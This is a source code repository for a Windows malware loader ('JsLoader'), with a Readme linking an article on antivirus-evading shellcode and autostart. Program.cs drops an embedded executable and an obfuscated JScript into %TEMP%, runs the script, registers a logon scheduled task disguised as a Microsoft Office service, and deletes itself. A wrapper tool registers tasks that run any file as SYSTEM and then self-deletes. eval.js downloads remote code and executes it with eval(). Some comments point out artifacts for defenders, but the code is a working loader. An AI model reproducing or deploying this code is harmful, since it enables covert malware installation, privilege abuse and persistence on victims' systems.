├── Program.cs
├── Readme.md
├── TaskSchedulerWrapper
├── TaskSchedulerWrapper.sln
└── TaskSchedulerWrapper
│ ├── Program.cs
│ ├── Properties
│ ├── AssemblyInfo.cs
│ └── app.manifest
│ ├── TaskSchedulerWrapper.csproj
│ ├── app.config
│ ├── bin
│ └── Debug
│ │ ├── Microsoft.Win32.TaskScheduler.dll
│ │ ├── TaskScheduler.exe
│ │ └── TaskScheduler4.exe
│ └── packages.config
└── eval.js
/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Security.Cryptography;
5 | using System.Text;
6 | using TaskScheduler;
7 |
8 | namespace jsLoader
9 | {
class Program
{
    // Placeholder for the Base64/DES-encrypted script body. The original text
    // reads: "the js to drop; it can be DES-encrypted first and then placed
    // here". As written it is not valid Base64 (CJK characters and a comma),
    // so Decode() below returns null and the dropped .tmp file stays empty.
    static string v1gf8hg16cx1d = "要释放的js,可以先用des加密再放进来";
    // Decrypted script text. Evaluated by the static initializer, i.e. before
    // Main runs; an exception escaping Decode() would surface as a
    // TypeInitializationException and never reach Main's catch block.
    static string gh216f9ghj156 = Decode(v1gf8hg16cx1d);

    /// <summary>
    /// Base64-decodes <paramref name="data"/> and DES-decrypts it with the
    /// key/IV literals embedded below, returning the plaintext as text.
    /// </summary>
    /// <param name="data">Base64 text of the DES ciphertext.</param>
    /// <returns>The decrypted text, or null when <paramref name="data"/> cannot be Base64-decoded.</returns>
    public static string Decode(string data)
    {
        // Key and IV are plain ASCII literals inside the binary, so anyone who
        // has the file can recover the payload the same way; this is
        // obfuscation, not secrecy.
        // NOTE(review): DES uses an 8-byte key and 8-byte IV; these 3- and
        // 2-byte literals are placeholders that CreateDecryptor is expected to
        // reject.
        byte[] bytes = Encoding.ASCII.GetBytes("key");
        byte[] bytes2 = Encoding.ASCII.GetBytes("IV");
        byte[] buffer;
        try
        {
            buffer = System.Convert.FromBase64String(data);
        }
        catch
        {
            // Any decode failure (FormatException for non-Base64 input, or a
            // null argument) is swallowed and reported as null.
            return null;
        }
        DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();
        MemoryStream stream = new MemoryStream(buffer);
        CryptoStream stream2 = new CryptoStream(stream, descryptoServiceProvider.CreateDecryptor(bytes, bytes2), CryptoStreamMode.Read);
        StreamReader streamReader = new StreamReader(stream2);
        // Neither the streams nor the provider are disposed.
        return streamReader.ReadToEnd();
    }

    /// <summary>
    /// Entry point. Drops an executable taken from an embedded resource and a
    /// script file into %TEMP% under random names, runs the script with
    /// cscript.exe, registers a logon-triggered scheduled task that launches
    /// the dropped executable, starts that task, and then deletes and
    /// terminates itself. Everything runs under one catch-all that only prints
    /// the error.
    /// </summary>
    /// <param name="args">Unused.</param>
    static void Main(string[] args)
    {
        // Original comment: "the file-dropping logic here is written ad hoc".
        // Two 32-character random file names are drawn with System.Random
        // (not a cryptographic RNG; adequate for a file name, meaningless as a
        // secret). The alphabet omits lowercase 'l' and uppercase 'I'.
        string allowedChars = "abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNOPQRSTUVWXYZ0123456789";
        int passwordLength = 32;
        char[] chars = new char[passwordLength];
        char[] charss = new char[passwordLength];
        Random rd = new Random();

        for (int i = 0; i < passwordLength; i++)
        {
            chars[i] = allowedChars[rd.Next(0, allowedChars.Length)];
        }
        for (int i = 0; i < passwordLength; i++)
        {
            charss[i] = allowedChars[rd.Next(0, allowedChars.Length)];
        }

        string pwd = new string(chars);   // name of the dropped .tmp script
        string pwd2 = new string(charss); // name of the dropped .exe

        try
        {
            // Original comment: "put the file that should run at startup into
            // the resource; it is exported from here". Resource1 is not part of
            // this listing, so the payload's content is not visible here.
            byte[] byDll = global::jsLoader.Properties.Resource1.test;
            // Original comment: "set the drop path". Writes %TEMP%\<random>.exe.
            string strPath = Path.GetTempPath() + @"\" + pwd2 + ".exe";
            // Original comment: "create the file (overwrite mode)".
            using (FileStream fs = new FileStream(strPath, FileMode.Create))
            {
                fs.Write(byDll, 0, byDll.Length);
            }
            // The decrypted script goes to %TEMP%/<random>.tmp (forward slash
            // here, backslash for the .exe above). The writer is closed by hand
            // rather than with 'using', so an exception from Write would leave
            // the handle open until GC.
            StreamWriter sw = new StreamWriter(Path.GetTempPath() + "/" + pwd + ".tmp");
            sw.Write(gh216f9ghj156);
            sw.Flush();
            sw.Close();
            // Runs the dropped script through the Windows Script Host JScript
            // engine. Defender note: "cscript.exe /e:JScript <%TEMP% path ending
            // in .tmp>" spawned by an unsigned parent is the most distinctive
            // process-creation artifact of this loader.
            Process CmdProcess = new Process();
            CmdProcess.StartInfo.FileName = "cscript.exe";
            CmdProcess.StartInfo.CreateNoWindow = true;
            CmdProcess.StartInfo.UseShellExecute = false;
            // All three standard streams are redirected but never read, so the
            // script's output is simply discarded.
            CmdProcess.StartInfo.RedirectStandardInput = true;
            CmdProcess.StartInfo.RedirectStandardOutput = true;
            CmdProcess.StartInfo.RedirectStandardError = true;
            CmdProcess.StartInfo.Arguments = "/e:JScript " + Path.GetTempPath() + "/" + pwd + ".tmp";
            CmdProcess.Start();
            CmdProcess.WaitForExit();
            CmdProcess.Close();
            // Original comment: "delete the file once it has run; the autostart
            // file re-drops it when it executes". Only IOException is handled
            // here; any other exception propagates to the outer catch.
            if (File.Exists(Path.GetTempPath() + "/" + pwd + ".tmp"))
            {
                try
                {
                    File.Delete(Path.GetTempPath() + "/" + pwd + ".tmp");
                }
                catch (System.IO.IOException e)
                {
                    Console.WriteLine(e.Message);
                }
            }
            // Original comment: "create a scheduled task". Uses the COM Task
            // Scheduler interop from the TaskScheduler namespace.
            TaskSchedulerClass scheduler = new TaskSchedulerClass();
            // Original comment: "connect" — all-null arguments mean the local
            // machine with the current credentials.
            scheduler.Connect(null, null, null, null);
            // Original comment: "get the folder the task is created in" — the
            // root of the task store.
            ITaskFolder folder = scheduler.GetFolder("\\");
            // Original comment: "set parameters".
            ITaskDefinition task = scheduler.NewTask(0);
            // The registration metadata impersonates Microsoft Office. Defender
            // note: a task whose Author is "Microsoft Office" but whose action
            // points into %TEMP% is the inconsistency worth alerting on.
            task.RegistrationInfo.Author = "Microsoft Office"; // original comment: "creator"
            task.RegistrationInfo.Description = "This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft."; // original comment: "description"
            // Original comment: "set the trigger (here: after logon)".
            task.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_LOGON);
            // Original comment: "set the action (here: run an exe)" — the
            // executable dropped above.
            IExecAction action = (IExecAction)task.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC);
            action.Path = Path.GetTempPath() + @"\" + pwd2 + ".exe"; // original comment: "set the file path"
            // Original comment: "stop the task on time-out? PT0S disables the
            // time-out".
            task.Settings.ExecutionTimeLimit = "PT0S";
            task.Settings.DisallowStartIfOnBatteries = false; // original comment: "run only on AC power" (false = also on battery)
            task.Settings.RunOnlyIfIdle = false;              // original comment: "run only when idle" (false = do not wait for idle)

            // No user or password is supplied and the logon type is the
            // interactive token, so the task runs as the registering user at
            // that user's logon.
            IRegisteredTask regTask =
                folder.RegisterTaskDefinition("Office ClickToRun Service Monitor", task, // original comment: "the task name goes here"
                (int)_TASK_CREATION.TASK_CREATE, null, //user
                null, // password
                _TASK_LOGON_TYPE.TASK_LOGON_INTERACTIVE_TOKEN,
                "");
            // Start the task right away in addition to the logon trigger.
            IRunningTask runTask = regTask.Run(null);
            Console.WriteLine("OK");
            // Original comment: "self-destruct after running". Spawns
            // cmd.exe /c del "<own image path>" and then kills this process.
            string s = Process.GetCurrentProcess().MainModule.FileName;
            Process.Start("Cmd.exe", "/c del " + "\"" + s + "\"");
            Process.GetCurrentProcess().Kill();
        }
        catch (Exception ex)
        {
            // Any failure above is only printed; dropped files are not removed.
            Console.WriteLine(ex.Message);
            Console.WriteLine(ex.StackTrace);
        }
    }
}
129 | }
130 |
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | # JsLoader
2 |
3 | 文章:[免杀shellcode并绕过杀毒添加自启动](https://wtfsec.org/posts/%E5%85%8D%E6%9D%80shellcode%E5%B9%B6%E7%BB%95%E8%BF%87%E6%9D%80%E6%AF%92%E6%B7%BB%E5%8A%A0%E8%87%AA%E5%90%AF%E5%8A%A8/)
4 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.757
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TaskSchedulerWrapper", "TaskSchedulerWrapper\TaskSchedulerWrapper.csproj", "{24101193-5ABA-45D0-A5C0-320D78A88FF2}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {D520469B-FCD2-4948-87B9-FCBBE923DB78}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/Program.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32.TaskScheduler;
2 | using System;
3 | using System.Diagnostics;
4 | using System.IO;
5 |
6 | namespace TaskSchedulerWrapper
7 | {
class Program
{
    /// <summary>
    /// Entry point. Parses "--path=", "--arg=" and "--taskname=" arguments,
    /// then registers (or deletes and re-registers) a logon-triggered
    /// scheduled task that runs the given file as SYSTEM, checks that the task
    /// now exists, and finally deletes its own executable via killMe().
    /// </summary>
    /// <param name="args">Command-line arguments, each of the form key=value.</param>
    static void Main(string[] args)
    {
        logo();
        string taskname = null;
        string parameter = null;
        string path = null;
        if (args.Length > 0)
        {
            foreach (var arg in args)
            {
                // Each argument is split on '='. An argument without '=' makes
                // the [1] index throw an uncaught IndexOutOfRangeException, and
                // a value that itself contains '=' is cut at that character.
                // Unknown keys are silently ignored.
                string userQue = arg.Split('=')[0].Trim();
                string userAns = arg.Split('=')[1].Trim();
                switch (userQue)
                {
                    case "--taskname":
                        taskname = userAns;
                        break;
                    case "--arg":
                        parameter = userAns;
                        break;
                    case "--path":
                        path = userAns;
                        break;
                }
            }

            // --arg is optional; --path and --taskname are required.
            if (path != null && taskname != null)
            {
                path = Path.GetFullPath(path);
                if (File.Exists(path) == true)
                {
                    if (!GetExists(taskname))
                    {
                        // "Task does not exist, adding..."
                        Console.WriteLine("任务计划不存在,正在添加...");
                        CreateTask(path, taskname, parameter);
                        // "Added, verifying that it exists..."
                        Console.WriteLine("添加完毕,正在验证是否存在...");
                        if (GetExists(taskname))
                        {
                            // "Verified, exiting."
                            Console.WriteLine("验证成功,退出线程。");
                        }
                        else
                        {
                            // "Verification failed, possibly blocked by antivirus, exiting."
                            Console.WriteLine("验证失败,可能被杀毒拦截,退出线程。");
                        }
                    }
                    else
                    {
                        // "Task already exists, trying to delete it..."
                        Console.WriteLine("计划任务已存在,尝试删除计划任务...");
                        DeleteTask(taskname);
                        if (GetExists(taskname))
                        {
                            // "Delete failed, exiting."
                            Console.WriteLine("删除失败,退出线程。");
                        }
                        else
                        {
                            // "Deleted, adding..."
                            Console.WriteLine("删除成功,正在添加...");
                            CreateTask(path, taskname, parameter);
                            // "Added, verifying that it exists..."
                            Console.WriteLine("添加完毕,正在验证是否存在...");
                            if (GetExists(taskname))
                            {
                                // "Verified, exiting."
                                Console.WriteLine("验证成功,退出线程。");
                            }
                            else
                            {
                                // "Verification failed, possibly blocked by antivirus, exiting."
                                Console.WriteLine("验证失败,可能被杀毒拦截,退出线程。");
                            }
                        }
                    }
                    // Self-deletion happens whether or not the task was
                    // registered successfully.
                    killMe();
                }
                else
                {
                    // "File does not exist or path is invalid, exiting."
                    Console.Write("文件不存在或路径不合法,退出线程。");
                }
            }
            else
            {
                Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"Executable File\" --arg=\"Arguments\"(Optional) --taskname=\"TaskScheduler name\"");
                Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"cscript.exe\" --arg=\"/E:Jscript 123.js\" --taskname=\"MS Update\"");
                Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"file.exe\" --taskname=\"MS Update\"");
            }
        }
        else
        {
            // Same usage text as above; the two branches are duplicates.
            Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"Executable File\" --arg=\"Arguments\"(Optional) --taskname=\"TaskScheduler name\"");
            Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"cscript.exe\" --arg=\"/E:Jscript 123.js\" --taskname=\"MS Update\"");
            Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"file.exe\" --taskname=\"MS Update\"");
        }
    }

    /// <summary>
    /// Reports whether a task named <paramref name="taskName"/> exists in the
    /// root folder of the local task store. Tasks in sub-folders are not seen.
    /// </summary>
    /// <param name="taskName">Task name as shown in Task Scheduler.</param>
    /// <returns>true when the root folder contains a task with that name.</returns>
    static bool GetExists(string taskName)
    {
        var exists = false;
        // NOTE(review): the TaskService is never disposed — confirm whether
        // the library expects callers to do so.
        TaskService ts = new TaskService();
        TaskCollection tc = ts.RootFolder.GetTasks();
        if (tc.Exists(taskName))
        {
            exists = true;
        }
        return exists;
    }

    /// <summary>
    /// Registers a logon-triggered task in the root folder that executes
    /// <paramref name="Path"/> as the SYSTEM service account, and starts it
    /// immediately. Existing tasks of the same name are overwritten.
    /// </summary>
    /// <param name="Path">Full path of the file to execute. Note this parameter shadows System.IO.Path inside the method.</param>
    /// <param name="taskName">Name to register the task under.</param>
    /// <param name="arg">Command-line arguments for the action; Main may pass null here.</param>
    static void CreateTask(string Path, string taskName, string arg = "")
    {
        TaskService ts = new TaskService();
        TaskDefinition td = ts.NewTask();
        // Defender note: the fixed author string "WDST" together with an
        // empty description is a stable fingerprint of tasks made by this tool.
        td.RegistrationInfo.Author = "WDST";
        td.RegistrationInfo.Description = "";
        // No UserId is set on the trigger; presumably it fires at any user's
        // logon — confirm against the library.
        td.Triggers.Add(new LogonTrigger { });
        // Third argument is the working directory (none).
        td.Actions.Add(new ExecAction(Path, arg, null));
        td.Settings.DisallowStartIfOnBatteries = false;
        td.Settings.RunOnlyIfIdle = false;
        // Runs as "SYSTEM" with the service-account logon type, so the action
        // executes with LocalSystem privileges at each logon. Registering a
        // task that way needs an elevated caller; whether the manifest requests
        // elevation is not visible in this listing (app.manifest is blank here).
        ts.RootFolder.RegisterTaskDefinition(taskName, td, TaskCreation.CreateOrUpdate, "SYSTEM", null, TaskLogonType.ServiceAccount).Run();
    }

    /// <summary>
    /// Deletes the task named <paramref name="taskName"/> from the root folder.
    /// </summary>
    /// <param name="taskName">Task name as shown in Task Scheduler.</param>
    static void DeleteTask(string taskName)
    {
        TaskService ts = new TaskService();
        ts.RootFolder.DeleteTask(taskName);
    }

    /// <summary>
    /// Deletes this process's own executable: launches a hidden cmd.exe whose
    /// "ping -n 1 localhost" acts as a short delay so the "del" runs after the
    /// process has exited, then kills the current process.
    /// </summary>
    static void killMe()
    {
        string s = Process.GetCurrentProcess().MainModule.FileName;
        Process CmdProcess = new Process();
        CmdProcess.StartInfo.FileName = "cmd.exe";
        CmdProcess.StartInfo.CreateNoWindow = true;
        CmdProcess.StartInfo.UseShellExecute = false;
        // Streams are redirected but never read.
        CmdProcess.StartInfo.RedirectStandardInput = true;
        CmdProcess.StartInfo.RedirectStandardOutput = true;
        CmdProcess.StartInfo.RedirectStandardError = true;
        // Defender note: "cmd.exe /c ping -n 1 localhost 1>nul & del "<path>""
        // with the parent's own image as <path> is the process-tree artifact
        // of this self-deletion.
        CmdProcess.StartInfo.Arguments = "/c ping -n 1 localhost 1>nul & del " + "\"" + s + "\"";
        CmdProcess.Start();
        // Close() only releases the Process handle; it does not wait.
        CmdProcess.Close();
        Process.GetCurrentProcess().Kill();
    }

    /// <summary>
    /// Prints the "TaskScheduler" ASCII banner followed by a blank line.
    /// </summary>
    static void logo()
    {
        Console.WriteLine(@" _____ _ ___ _ _ _ ");
        Console.WriteLine(@" |_ _|_ _ __| |__/ __| __| |_ ___ __| |_ _| |___ _ _ ");
        Console.WriteLine(@" | |/ _` (_-< / /\__ \/ _| ' \/ -_) _` | || | / -_) '_|");
        Console.WriteLine(@" |_|\__,_/__/_\_\|___/\__|_||_\___\__,_|\_,_|_\___|_| ");
        Console.WriteLine();
    }
}
153 | }
154 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// General information about the assembly is controlled through the
// following set of attributes. Change these attribute values to modify
// the information associated with the assembly.
[assembly: AssemblyTitle("TaskSchedulerWrapper")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("TaskSchedulerWrapper")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false hides the types in this assembly from COM
// components. If a type in this assembly must be accessed from COM,
// set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is the typelib ID used if this project is exposed to COM.
// It matches the project GUID recorded in TaskSchedulerWrapper.sln.
[assembly: Guid("24101193-5aba-45d0-a5c0-320d78a88ff2")]

// Version information for an assembly consists of the following four values:
//
//      Major version
//      Minor version
//      Build number
//      Revision
//
// You can specify all the values, or default the build and revision numbers
// by using '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/Properties/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
48 |
55 |
56 |
70 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/TaskSchedulerWrapper.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}
9 | Exe
10 | TaskSchedulerWrapper
11 | TaskSchedulerWrapper
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 |
19 |
20 | AnyCPU
21 | true
22 | full
23 | false
24 | bin\Debug\
25 | DEBUG;TRACE
26 | prompt
27 | 4
28 |
29 |
30 | AnyCPU
31 | pdbonly
32 | true
33 | bin\Release\
34 | TRACE
35 | prompt
36 | 4
37 |
38 |
39 | LocalIntranet
40 |
41 |
42 | false
43 |
44 |
45 |
46 | Properties\app.manifest
47 |
48 |
49 |
50 | False
51 | bin\Debug\Microsoft.Win32.TaskScheduler.dll
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 | 此專案參考這部電腦上所缺少的 NuGet 套件。請啟用 NuGet 套件還原,以下載該套件。如需詳細資訊,請參閱 http://go.microsoft.com/fwlink/?LinkID=322105。缺少的檔案是 {0}。
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/Microsoft.Win32.TaskScheduler.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hzllaga/JsLoader/58e4f8d9a8d5402e5cc839242cf5def2b74ca989/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/Microsoft.Win32.TaskScheduler.dll
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/TaskScheduler.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hzllaga/JsLoader/58e4f8d9a8d5402e5cc839242cf5def2b74ca989/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/TaskScheduler.exe
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/TaskScheduler4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hzllaga/JsLoader/58e4f8d9a8d5402e5cc839242cf5def2b74ca989/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/TaskScheduler4.exe
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/eval.js:
--------------------------------------------------------------------------------
// Windows Script Host (JScript) stager: fetches a script over HTTP and
// executes whatever text comes back. The COM XMLHTTP object is used
// because WSH has no built-in HTTP client.
var xml=new ActiveXObject("Microsoft.XMLHTTP");
// Synchronous GET (third argument false): the script blocks until the
// response arrives. The URL here is a loopback placeholder; "ccc.js" is
// not part of this listing.
xml.open("GET","http://127.0.0.1/ccc.js",false);
xml.send();
var aaa=xml.responseText;
// Defender note: the response body goes straight into eval() with no
// status check, no integrity check and no transport protection, so the
// code that runs is whatever that HTTP endpoint (or anything able to
// answer for it) returns.
eval(aaa);
--------------------------------------------------------------------------------